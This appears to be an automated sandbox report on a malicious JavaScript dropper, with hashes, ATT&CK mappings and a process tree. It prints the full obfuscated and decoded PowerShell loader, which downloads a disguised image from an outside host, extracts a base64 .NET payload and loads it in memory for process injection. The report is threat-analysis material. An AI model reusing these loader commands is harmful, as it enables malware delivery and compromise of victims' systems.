18d1b246a29100b10a3ce587927ebb0c615156352598621da18250f8ad06e318

General

Target

LPO.js
Size

133KB
MD5

de1ff5796636ce90ae34773c2492714f
SHA1

a737641923b33bb911f22e8da3bc98849737cd10
SHA256

18d1b246a29100b10a3ce587927ebb0c615156352598621da18250f8ad06e318
SHA512

e0d4ec7ebce60d0eba1c61db69090144864c7da89f7968a2d4de1c169e661717c5f1f8534fd435a674374f6453278dfa67b11ebb6dd585e4a1daf5071da8f39d
SSDEEP

3072:FLGoPD/IMIFiLTJIdmX/ZJYTaLGoPD/IM+:lQMIehmTcQM+

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600101.us.archive.org/1/items/detah-note-j_202410/DetahNote_J.jpg%20

exe.dropper

https://ia600101.us.archive.org/1/items/detah-note-j_202410/DetahNote_J.jpg%20

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2672	powershell.exe
6	2672	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2912	powershell.exe
2672	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2912	powershell.exe
2672	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	2672	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2852 wrote to memory of 2912	2852	wscript.exe	30
PID 2852 wrote to memory of 2912	2852	wscript.exe	30
PID 2852 wrote to memory of 2912	2852	wscript.exe	30
PID 2912 wrote to memory of 2672	2912	powershell.exe	32
PID 2912 wrote to memory of 2672	2912	powershell.exe	32
PID 2912 wrote to memory of 2672	2912	powershell.exe	32

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\LPO.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAKABHAEUAdAAtAFYAYQBSAEkAYQBCAGwAZQAgACcAKgBNAGQAUgAqACcAKQAuAE4AQQBNAGUAWwAzACwAMQAxACwAMgBdAC0AagBvAGkAbgAnACcAKQAoACgAJwBUAFEARQBpAG0AJwArACcAYQBnAGUAVQByAGwAIAA9ACAAWQB5AGgAaAB0AHQAcABzADoAJwArACcALwAvAGkAYQA2ADAAMAAxADAAMQAuACcAKwAnAHUAcwAuAGEAcgBjAGgAaQAnACsAJwB2AGUALgBvAHIAZwAvADEALwBpAHQAZQBtAHMAJwArACcALwBkAGUAdABhAGgALQBuAG8AdABlAC0AagBfADIAMAAyADQAMQAwAC8ARABlAHQAYQBoAE4AbwB0AGUAXwBKAC4AagBwAGcAIABZAHkAaAA7AFQAUQAnACsAJwBFAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAJwArACcAQwBsAGkAJwArACcAZQBuAHQAOwBUAFEARQAnACsAJwBpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAFQAUQBFAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKABUAFEARQBpAG0AYQBnAGUAVQByAGwAKQA7AFQAUQBFAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFQAUQBFAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AFQAUQBFAHMAdABhAHIAdABGAGwAYQBnACAAPQAgAFkAeQBoADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AWQB5AGgAOwAnACsAJwBUAFEARQBlAG4AZABGAGwAYQBnACAAPQAgAFkAeQBoADwAPABCACcAKwAnAEEAUwBFADYANABfAEUATgAnACsAJwBEAD4APgBZAHkAaAA7AFQAUQBFAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAVABRAEUAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAVABRAEUAcwB0AGEAcgB0AEYAbABhAGcAKQA7AFQAUQBFAGUAbgBkAEkAbgBkAGUAeAAgAD0AIABUAFEARQBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABUAFEARQBlAG4AZABGAGwAYQBnACkAOwBUAFEARQBzAHQAJwArACcAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgAFQAUQBFACcAKwAnAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAVABRAEUAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AFQAUQBFAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIABUAFEARQAnACsAJwBzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAVABRAEUAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAVABRAEUAZQBuAGQASQBuAGQAZQB4ACAALQAgAFQAUQBFAHMAdABhAHIAdABJAG4AZABlACcAKwAnAHgAOwBUAFEARQBiAGEAcwBlADYANABDAG8AbQBtACcAKwAnAGEAbgBkACAAPQAgAFQAUQBFAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABUAFEARQBzAHQAYQByAHQASQAnACsAJwBuAGQAZQB4ACwAIABUAFEARQBiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAVABRAEUAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCACcAKwAnAGEAJwArACcAcwBlADYANABTAHQAcgBpAG4AJwArACcAZwAoAFQAUQBFAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7AFQAUQBFACcAKwAnAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMAG8AYQBkACgAJwArACcAVABRAEUAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AFQAUQBFAHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKABZAHkAaABWAEEASQBZAHkAaAApADsAVABRAEUAdgBhAGkATQAnACsAJwBlAHQAaABvAGQALgBJAG4AdgBvAGsAZQAoAFQAUQBFAG4AdQBsAGwALAAgAEAAKABZAHkAaAB0AHgAdAAuAGEAZABhAHkAaQAvAHYAZQBkAC4AMgByAC4AMwA5AGIAMwA0ADUAMwAwADIAYQAwADcANQBiADEAYgBjADAAZAA0ADUAYgA2ADMAMgBlAGIAOQBlAGUANgAyACcAKwAnAC0AJwArACcAYgB1ACcAKwAnAHAALwAvADoAcwBwAHQAdABoAFkAeQBoACwAIABZAHkAaABkAGUAcwBhAHQAaQB2AGEAZABvAFkAeQBoACwAIABZAHkAaABkAGUAJwArACcAcwBhAHQAaQB2AGEAZABvAFkAeQBoACwAIABZAHkAaABkAGUAcwBhAHQAaQB2AGEAZABvAFkAeQBoACwAIABZAHkAaABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAzADIAWQB5AGgALAAgAFkAeQBoAGQAZQBzAGEAdABpAHYAYQBkAG8AWQB5ACcAKwAnAGgALAAnACsAJwAgAFkAeQBoAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AWQB5AGgAKQApADsAJwApAC4AUgBlAHAAbABhAGMARQAoACgAWwBjAGgAQQByAF0AOAA0ACsAWwBjAGgAQQByAF0AOAAxACsAWwBjAGgAQQByAF0ANgA5ACkALABbAHMAVAByAGkATgBHAF0AWwBjAGgAQQByAF0AMwA2ACkALgBSAGUAcABsAGEAYwBFACgAKABbAGMAaABBAHIAXQA4ADkAKwBbAGMAaABBAHIAXQAxADIAMQArAFsAYwBoAEEAcgBdADEAMAA0ACkALABbAHMAVAByAGkATgBHAF0AWwBjAGgAQQByAF0AMwA5ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((GEt-VaRIaBle '*MdR*').NAMe[3,11,2]-join'')(('TQEim'+'ageUrl = Yyhhttps:'+'//ia600101.'+'us.archi'+'ve.org/1/items'+'/detah-note-j_202410/DetahNote_J.jpg Yyh;TQ'+'EwebClient = New-Object System.Net.Web'+'Cli'+'ent;TQE'+'imageBytes = TQEwebClient.DownloadData(TQEimageUrl);TQEimageText = [System.Text.Encoding]::UTF8.GetString(TQEimageBytes);TQEstartFlag = Yyh<<BASE64_START>>Yyh;'+'TQEendFlag = Yyh<<B'+'ASE64_EN'+'D>>Yyh;TQEstartIndex = TQEimageText.IndexOf(TQEstartFlag);TQEendIndex = TQEimageText.IndexOf(TQEendFlag);TQEst'+'artIndex -ge 0 -and TQE'+'endIndex -gt TQEstartIndex;TQEstartIndex += TQE'+'startFlag.Length;TQEbase64Length = TQEendIndex - TQEstartInde'+'x;TQEbase64Comm'+'and = TQEimageText.Substring(TQEstartI'+'ndex, TQEbase64Length);TQEcommandBytes = [System.Convert]::FromB'+'a'+'se64Strin'+'g(TQEbase64Command);TQE'+'loadedAssembly = [System.Reflection.Assemb'+'ly]::Load('+'TQEcommandBytes);TQEvaiMethod = [dnlib.IO.Home].GetMethod(YyhVAIYyh);TQEvaiM'+'ethod.Invoke(TQEnull, @(Yyhtxt.adayi/ved.2r.39b345302a075b1bc0d45b632eb9ee62'+'-'+'bu'+'p//:sptthYyh, YyhdesativadoYyh, Yyhde'+'sativadoYyh, YyhdesativadoYyh, YyhAddInProcess32Yyh, YyhdesativadoYy'+'h,'+' Yyhdesativa'+'doYyh));').ReplacE(([chAr]84+[chAr]81+[chAr]69),[sTriNG][chAr]36).ReplacE(([chAr]89+[chAr]121+[chAr]104),[sTriNG][chAr]39) )"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
15bc613d2524d93cc742c8c00a918437

SHA1
0dcb566a4feedd3cbb36e415190adf52da744afb

SHA256
2073b023e49e646f8b31e332b64f5cd7358a6a62ad8d1a616bc887405b26313b

SHA512
701231b9326e665aa835cdda0c9ec096f20ddc0f6ea5b3c5cd0b4c715a15577d19164a9b9fa1d97b69fe5c120f0cac912572496bdec950f67f576cf9340b6fb6

Download Submit
memory/2912-4-0x000007FEF5CCE000-0x000007FEF5CCF000-memory.dmp

Filesize
4KB

Download
memory/2912-5-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/2912-6-0x0000000002770000-0x0000000002778000-memory.dmp

Filesize
32KB

Download
memory/2912-8-0x000007FEF5A10000-0x000007FEF63AD000-memory.dmp

Filesize
9.6MB

Download
memory/2912-9-0x000007FEF5A10000-0x000007FEF63AD000-memory.dmp

Filesize
9.6MB

Download
memory/2912-14-0x000007FEF5A10000-0x000007FEF63AD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing